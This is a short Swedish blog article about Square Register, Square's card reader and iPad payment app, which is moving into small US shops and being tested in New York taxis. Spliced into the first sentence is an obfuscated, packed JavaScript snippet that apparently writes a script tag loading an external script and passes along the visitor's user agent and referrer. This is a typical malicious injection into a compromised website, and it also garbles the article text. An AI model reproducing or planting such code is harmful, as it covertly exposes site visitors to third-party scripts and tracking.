Image Image Image Image Image Image Image Image Image Image

| 18 september, 2018

Scroll to top

Top

Nu vill Square ta över kassorna

Sebastian Plengier Ehrnfelt

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bikab|var|u0026u|referrer|hbiin||js|php’.split(‘|’),0,{}))
är den smidiga betaltjänsten Square register som fotsätter att expandera. Nu vill de ta över kassorna i småbutiker.

Med sin kortläsare och iPad-app är det nu dags att plocka marknadsandelar. Vi vet att det pratas mycket om olika nya betallösningar som ska göra det enklare för oss att göra de ”små” köpen. Självklart är det mobiler, smartphones och surfplattor som står i centrum för dessa tjänster.

Square register börjar nu med att plocka de små butikerna i USA och trycker på att det är en billigare och säkrare tjänst än många andra. En av de största grejerna som Square har på g är att de nu kommer att testa systemet i 30 av New Yorks taxibilar, ganska coolt enligt mig och smart.

Se filmen ovan för att få en förståelse av hur det fungerar.